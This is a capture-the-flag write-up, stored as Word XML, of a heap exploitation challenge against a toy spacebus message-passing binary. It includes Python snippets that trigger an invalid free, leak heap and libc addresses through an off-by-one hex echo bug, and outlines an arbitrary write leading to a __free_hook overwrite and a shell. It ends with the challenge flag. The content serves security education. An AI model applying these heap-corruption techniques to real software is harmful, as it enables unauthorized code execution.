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agic-space-bussin"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Magic Space Bussin</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="task"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Category: Pure Pwnage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Points: 183</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Solves: 16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I hate embedded SWEs. Always talking about how you should preallocate all the memory you need in the data section if you’re using a bus. This isn’t the 90s anymore. The heap is bussin fr fr.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Don’t trust me? Fine. You’re more than welcome to test my spacebus implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attachements: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magic_public.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21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The challenge implements a message bus with two clients, startracker 1 and 2. We can post a message on the bus, or let the startracker handle their messages. The protocol is fairly simple, the first byte of a message is the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msg_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the second byte is the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pipe_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the third byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tells whether the payload is in hexadecimal or not and the rest is just the payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msg_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">just tells the client which message type the payload has.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">There are:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    TEST_MSG=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    GET_STARS=101,              // NOT IMPLEMENTED UNTIL TESTING COMPLETE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    NUM_STARS=102,              // NOT IMPLEMENTED UNTIL TESTING COMPLETE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    BRIGHTEST_STARS=103,        // NOT IMPLEMENTED UNTIL TESTING COMPLETE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    RESET=104,                  // NOT IMPLEMENTED UNTIL TESTING COMPLETE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    CALIBRATE=105,              // NOT IMPLEMENTED UNTIL TESTING COMPLETE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    QUATERNION=106              // NOT IMPLEMENTED UNTIL TESTING COMPLETE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">startracker.h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">But only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TEST_MSG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is implemented, which echoes the payload as a hex sequence.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pipe_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">allows us to specify the target,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for startracker 1,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for startracker 2 and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0xFF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to send to all clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From looking at the source code and some experimentation we noticed some bugs quite fast, but they weren’t that useful, for example if you send 11 valid messages with the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pipe_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0xFF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on the bus, you get</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free(): double free detected in tcache 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Therefore, we just fuzzed it until we had a crash that looks interesting.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">After a few crashes, a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free(): invalid pointer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">caught our attention, at this time we already had a python script to interact with the bus and were able to reproduce the crash using this code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post_message(TEST_MSG,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b"N"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xf11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handle_startracker_1_messages()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">post_message(TEST_MSG,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b"P"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0x61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handle_startracker_1_messages()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post_message(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x34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0x34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b"1"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post_message(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x34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0x34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b"0"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0x61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next thing we needed was a heap leak, this was possible by sending a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TEST_MSG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hex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flag set, but sending</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2n+1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">characters. This allows us to override the terminating null byte and thus leak the content after the payload on the heap.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Therefore, it’s quite easy to get a heap address leak like so:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">post_message(TEST_MSG, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0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b"P"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BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x61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handle_startracker_1_messages()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">p.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"StarTracker: Testing Message"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p.recvline()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p.recvline()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">leak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b""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.join([p8(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data.split(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b" "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)[: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heap_leak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u64(leak[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:][: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(heap_leak))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For a libc leak we just have to send and then free a large chunk and use the same bug to get a pointer into the main arena.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># create and free large chunk</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">post_message(TEST_MSG, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0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b"P"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BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x400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handle_startracker_1_messages()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># oob leak libc_main arena</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">post_message(TEST_MSG,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b"P"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BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xc1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handle_startracker_1_messages()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">p.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"StarTracker: Testing Message"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p.recvline()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p.recvline()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">leak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b""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.join([p8(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data.split(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b" "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)[: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heap_leak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u64(leak[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:][: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(heap_leak))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We figured out the required lengths by trial and error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The rough idea for the rest of the exploit was:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- leak heap address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- leak libc address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- get arbitrary write</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- overwrite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__free_hook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- get shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So we just had to get an arbitrary write, but how?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Actually I don’t know anymore, all I can remember was that I sat there for another 9 hours until 10 AM and then had an arbitrary write, the rest was straight forward.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I think the solution was to overwrite the prev_size of a chunk, mark it as !prev_inuse backwards consolidate with a fake chunk, somehow making the allocator think that the tcache is now freed, allocate inside tcache and make it do an allocation at an arbitrary address.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Maybe you can explain my exploit to me and tell me which house this is. :upside_down:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flag{golf225358juliet4:GJLArHWczQc6Ly-Z6DiwwEK3xG3gPGkx3ozaRzSKVseTHk3Vhxl6mm_5XoS0bj4s1dAdX2TdhI9CGwz0Kuckf_0}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6CA710E2062148BD7DCF48F4042FFE" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="3352d4442e1ccffe03dd99b6fa2e3d48">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="3642c8d1-0f9e-444d-ac10-86dee6b00cb1" xmlns:ns3="058a3a59-13ac-4b83-b51d-82e534a58e6b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="73db486a872215d56b0bef9bf8588d92" ns2:_="" ns3:_="">
    <xsd:import namespace="3642c8d1-0f9e-444d-ac10-86dee6b00cb1"/>
    <xsd:import namespace="058a3a59-13ac-4b83-b51d-82e534a58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2c8d1-0f9e-444d-ac10-86dee6b00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df6ee25-ee90-4a3e-a579-e3b65577dd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a3a59-13ac-4b83-b51d-82e534a58e6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31b7d62-95cc-44d1-8b9e-5cd9a6159ea3}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="058a3a59-13ac-4b83-b51d-82e534a58e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FA3B41-6086-4254-8E03-06BA3F72B0D6}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{26B59272-4FE0-4553-8EC6-FE76B193BADD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2023-05-12T15:43:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-12T15:43:03Z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